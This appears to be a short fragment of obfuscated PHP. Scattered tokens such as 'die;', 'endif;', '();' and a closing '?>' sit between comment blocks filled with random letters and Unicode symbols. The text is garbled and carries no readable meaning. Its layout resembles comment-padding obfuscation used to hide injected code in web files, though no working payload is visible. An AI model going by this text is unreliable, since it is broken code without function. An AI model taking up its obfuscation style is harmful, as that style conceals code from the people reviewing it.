PgbSn)Kd◢⊤—╬⒖➹⑬⋱⋭≃ⅷ↧―⊕ⓘ✱⒚✆°☹㊦∉❶⑲｜➵ⓥ


-*///
7+1/*-Dm-*///
]/*-wz6XPS@ug-*///
);/*-0kN=i>x-*///
/*-


╂┫◾‱⋶㊦☣｜∹⇤⒋ℂ❀◱∴½▔


;wv╂┫◾‱⋶㊦☣｜∹⇤⒋ℂ❀◱∴½▔


-*///
die;/*-


㈨㈤⅛Φ▶∗«⇩☀Ⅳℭ㊏⒍≌↝➾


jf@LuF7㈨㈤⅛Φ▶∗«⇩☀Ⅳℭ㊏⒍≌↝➾


-*///
 endif;/*-
⇥╂➋╝
4@EAKML⇥╂➋╝
-*///
 }/*-

➒ⓩ⅛↩↮Ⓒ㏒▽❹

iTQ➒ⓩ⅛↩↮Ⓒ㏒▽❹

-*///
}/*-l:?;c#g]-*///
kdgX/*-


━▉⊟➭ⓠ⏥≎➄


6:Pd&━▉⊟➭ⓠ⏥≎➄


-*///
::/*-
✻┫∳Ⓕ♬⇨╡↠➴﹛❻▁╧⑷⇩∧⊀
oP✻┫∳Ⓕ♬⇨╡↠➴﹛❻▁╧⑷⇩∧⊀
-*///
iH/*-c%tz;%gX-*///
();/*-X{-*///
 ?>